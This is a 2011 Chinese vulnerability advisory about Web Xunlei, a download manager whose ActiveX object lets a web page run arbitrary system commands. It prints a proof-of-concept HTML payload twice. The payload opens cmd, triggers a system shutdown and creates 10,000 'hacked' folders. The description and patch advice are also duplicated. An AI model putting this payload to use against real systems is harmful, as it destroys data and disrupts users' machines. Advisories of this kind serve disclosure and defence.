web迅雷允许执行任意系统命令漏洞

发表于 2011年05月03日
日志

影响版本:

XunLei web迅雷

1	XunLei web迅雷

漏洞描述:

Web迅雷是一款基于多资源超线程技术的下载工具，它继承了迅雷5的操作方便、高速下载的特点外，同时使用全网页化的操作界面，更符合互联网用户使用习惯，是国内第一款网页上的下载工具。

Web迅雷在实现上存在设计漏洞，程序会接收攻击者提供的恶意参数直接执行，远程攻击者可利用此漏洞控制用户受影响系统。

Web迅雷是一款基于多资源超线程技术的下载工具，它继承了迅雷5的操作方便、高速下载的特点外，同时使用全网页化的操作界面，更符合互联网用户使用习惯，是国内第一款网页上的下载工具。

Web迅雷在实现上存在设计漏洞，程序会接收攻击者提供的恶意参数直接执行，远程攻击者可利用此漏洞控制用户受影响系统。

<*参考

http://www.inbreak.net/archives/165

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<head>
<title>迅雷执行任意系统命令</title>
</head>
<body>
运行迅雷加载项。
<script>
/**
*by kxlzx
*/
server = new ActiveXObject("ThunderServer.WebThunder.1");
if(server==null)
{
 alert("没装迅雷，请安装web迅雷");
 window.location.href="http://dl.xunlei.com/wxl.html";
}else{
 server.OpenDirectory("cmd");
 alert("要我帮你关机么？");
 alert("哎呀呀！悲剧啊！你怎么不小心点了确定了？");
 server.OpenDirectory("tsshutdn");
 //创建无数文件夹
 j = 10000;
 for(i=0;i<j;i++){
 server.CreatePathTree("c:\\hacked by kxlzx "+i);
 }
 setTimeout("alert('还愣着？赶快保存啊！')",50000);
}

</script>
</body>
</html>

<html>

<head>

<title>迅雷执行任意系统命令</title>

</head>

<body>

运行迅雷加载项。

/**

*by kxlzx

server = new ActiveXObject("ThunderServer.WebThunder.1");

if(server==null)

{

alert("没装迅雷，请安装web迅雷");

window.location.href="http://dl.xunlei.com/wxl.html";

}else{

server.OpenDirectory("cmd");

alert("要我帮你关机么？");

alert("哎呀呀！悲剧啊！你怎么不小心点了确定了？");

server.OpenDirectory("tsshutdn");

//创建无数文件夹

j = 10000;

for(i=0;i<j;i++){

server.CreatePathTree("c:\\hacked by kxlzx "+i);

}

setTimeout("alert('还愣着？赶快保存啊！')",50000);

}

</script>

</body>

</html>

安全建议:

厂商补丁：

XunLei
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dl.xunlei.com/wxl.html

厂商补丁：

XunLei

------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dl.xunlei.com/wxl.html

// uedbox.com [2011-05-01]

标签：漏洞 , 迅雷漏洞原文连接：web迅雷允许执行任意系统命令漏洞 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

本拉丹之死－孤胆英雄 2011年20款国外免费杀毒软件推荐